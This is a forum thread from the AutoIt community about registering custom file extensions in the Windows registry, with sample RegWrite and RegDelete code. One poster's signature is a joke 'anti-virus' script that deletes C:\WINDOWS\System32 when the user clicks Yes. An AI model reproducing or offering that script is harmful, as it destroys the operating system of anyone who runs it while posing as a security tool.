Can you create your own file extensions?

Firefoxy

Can I use AutoIt to save files as extensions I make (ex. .poopoo) And if I can, can I give the file special attributes? I was thinking of creating basically a .txt file that also has a password imbedded into the file that the user entered the time he created the file that would be needed to read/edit the file. Is this possible?

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf

Look at the following script. Should get you on your way. :)

Registry Creation Code

$ext = ".ber"
$name = "Bert123"
$type = "TEXT"
$description = "Test Ext"
$iconpath = "C:\WINDOWS\system32\shell32.dll,40"
$defaultaction = "Open"
$openpath = "C:\My Files\open.exe"
$editpath = "C:\My Files\open.exe"

$hndl = FileOpen ("D:\MyFile" & $ext, 2)
FileClose ($hndl)

RegWrite ("HKEY_CLASSES_ROOT\" & $ext, "", "REG_SZ", $name)
RegWrite ("HKEY_CLASSES_ROOT\" & $ext, "PerceivedType", "REG_SZ", $type)
RegWrite ("HKEY_CLASSES_ROOT\" & $ext & "\ShellNew", "FileName", "REG_SZ", "template" & $ext)
RegWrite ("HKEY_CLASSES_ROOT\" & $name, "", "REG_SZ", $description)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\DefaultIcon", "", "REG_SZ", $iconpath)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell", "", "REG_SZ", $defaultaction)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Open", "", "REG_SZ", "Open")
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Open\Command", "", "REG_SZ", '"'&$openpath&'" "%1" "-a"')
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Edit", "", "REG_SZ", "Edit")
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Edit\Command", "", "REG_SZ", '"'&$editpath&'" "%1" "-b"')

open.exe:

$text = ""
$cmd = ""
If $CmdLine[0] <> 0 Then
    $file = $CmdLine[1]
    $parm = $CmdLine[2]
    If $parm = "-a" Then
        $cmd = "Open The File (" & $file & ")"
    ElseIf $parm = "-b" Then
        $cmd = "Edit the File (" & $file & ")"
    Else
        $cmd = "Unknown"
    EndIf
    MsgBox (0, "Output", $cmd)
Else
    MsgBox(0, "", "What are you trying to do?")
EndIf

Hope that helps you :P

EDIT: Fixed error in code.

Edited by Bert

Nice one Bert

George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

"Old age and treachery will always overcome youth and skill!"

Wow....that's perfect. Thanks. By the way, how do you know all that???

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

how would you delete that?

love it...but...how would i delete it?

Look up RegDelete in the help file. Be CAREFUL to have the right key. In this case (if you used the extension that Bert used)

HKEY_CLASSES_ROOT\.ber

George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

so this will work?

RegDelete("HKEY_CLASSES_ROOT\.ber")
Yes, if that is the key you actually created.

George

Hahahaha... How do I know all that? I don't. I worked it out. Be sure when you create your file ext, you look it up on http://filext.com/ and make sure it is not used. Hard I know, but nevertheless do it. Also, to delete your file ext:

RegDelete ("HKEY_CLASSES_ROOT\" & $name)
RegDelete ("HKEY_CLASSES_ROOT\" & $ext)

Hope that helps. Ill post this as an example later... :)

Hope that helps. Ill post this as an example later... :)

It did. I have a question though. Can I embed information into a file? Like an ID3 tag does for .mp3, .wav, etc.? I just want to embed a password that the user selects when creating the file. Is this possible with AutoIt?

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

It did. I have a question though. Can I embed information into a file? Like an ID3 tag does for .mp3, .wav, etc.? I just want to embed a password that the user selects when creating the file. Is this possible with AutoIt?

Yes. Look at the File... functions. MP3's have them embedded, and the selected programs know how to read that data... Your program just needs to know how to read that data.

Look at the following script. Should get you on your way. :)

Registry Creation Code

$ext = ".ber"
$name = "Bert123"
$type = "TEXT"
$description = "Test Ext"
$iconpath = "C:\WINDOWS\system32\shell32.dll,40"
$defaultaction = "Open"
$openpath = "C:\My Files\open.exe"
$editpath = "C:\My Files\open.exe"

$hndl = FileOpen ("D:\MyFile" & $ext, 2)
FileClose ($hndl)

RegWrite ("HKEY_CLASSES_ROOT\" & $ext, "", "REG_SZ", $name)
RegWrite ("HKEY_CLASSES_ROOT\" & $ext, "PerceivedType", "REG_SZ", $type)
RegWrite ("HKEY_CLASSES_ROOT\" & $ext & "\ShellNew", "FileName", "REG_SZ", "template" & $ext)
RegWrite ("HKEY_CLASSES_ROOT\" & $name, "", "REG_SZ", $description)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\DefaultIcon", "", "REG_SZ", $iconpath)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell", "", "REG_SZ", $defaultaction)
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Open", "", "REG_SZ", "Open")
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Open\Command", "", "REG_SZ", '"'&$openpath&'" "%1" "-a"')
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Edit", "", "REG_SZ", "Edit")
RegWrite ("HKEY_CLASSES_ROOT\" & $name & "\Shell\Edit\Command", "", "REG_SZ", '"'&$editpath&'" "%1" "-b"')

open.exe:

$text = ""
$cmd = ""
If $CmdLine[0] <> 0 Then
    $file = $CmdLine[1]
    $parm = $CmdLine[2]
    If $parm = "-a" Then
        $cmd = "Open The File (" & $file & ")"
    ElseIf $parm = "-b" Then
        $cmd = "Edit the File (" & $file & ")"
    Else
        $cmd = "Unknown"
    EndIf
    MsgBox (0, "Output", $cmd)
Else
    MsgBox(0, "", "What are you trying to do?")
EndIf

Hope that helps you :P

EDIT: Fixed error in code.

how oddly similar to AuthMod for Amp 3

func Create($EXT,$ICON)

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"","REG_SZ","AMP3."&$EXT&".File")

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"Content Type","REG_SZ","audio/mpeg")

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"PerceivedType","REG_SZ","audio")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File","","REG_SZ","AMP 3 media file")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\DefaultIcon","","REG_SZ",$ICON)

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell","","REG_SZ","play")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\play","","REG_SZ","&Play in AMP 3")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\play\command","","REG_SZ",'"'&@scriptdir&"\..\amp 3.exe"&'"'&'"%1"')

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\open","","REG_SZ","&Open in AMP 3")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\open\command","","REG_SZ",'"'&@scriptdir&"\..\amp 3.exe"&'"'&'"%1"')

endfunc

[center][/center]

how oddly similar to AuthMod for Amp 3

func Create($EXT,$ICON)

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"","REG_SZ","AMP3."&$EXT&".File")

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"Content Type","REG_SZ","audio/mpeg")

regwrite("HKEY_CLASSES_ROOT\."&$EXT,"PerceivedType","REG_SZ","audio")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File","","REG_SZ","AMP 3 media file")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\DefaultIcon","","REG_SZ",$ICON)

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell","","REG_SZ","play")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\play","","REG_SZ","&Play in AMP 3")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\play\command","","REG_SZ",'"'&@scriptdir&"\..\amp 3.exe"&'"'&'"%1"')

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\open","","REG_SZ","&Open in AMP 3")

regwrite("HKEY_CLASSES_ROOT\AMP3."&$EXT&".File\shell\open\command","","REG_SZ",'"'&@scriptdir&"\..\amp 3.exe"&'"'&'"%1"')

endfunc

I don't really see why it would ever be done any differently.

I think what Bert has done is export a couple of existing keys, make the required changes and then reformat the reg file to AutoIt code. Almost anyone would do it that way.

George

lol I didn't think he copied besides I could care less if he did the creator of AuthMod by buddy he just looked at win amps keys to create it... When I said that it was oddly similar I meant that i figured we both copied another program from the registry lol I was just wondering (to myself) if it was winamp

[center][/center]

By the way,

you can search here: http://filext.com/file-extension/ber

to find a file extension which is not in use ore at least not used from a common program.

Best regards, Reinhard

Knew I forgot to tell the littlies something... :)

@DBAK- Didn't copy your code. Just used as Geo said, a copy of some keys. AutoIt's in fact :P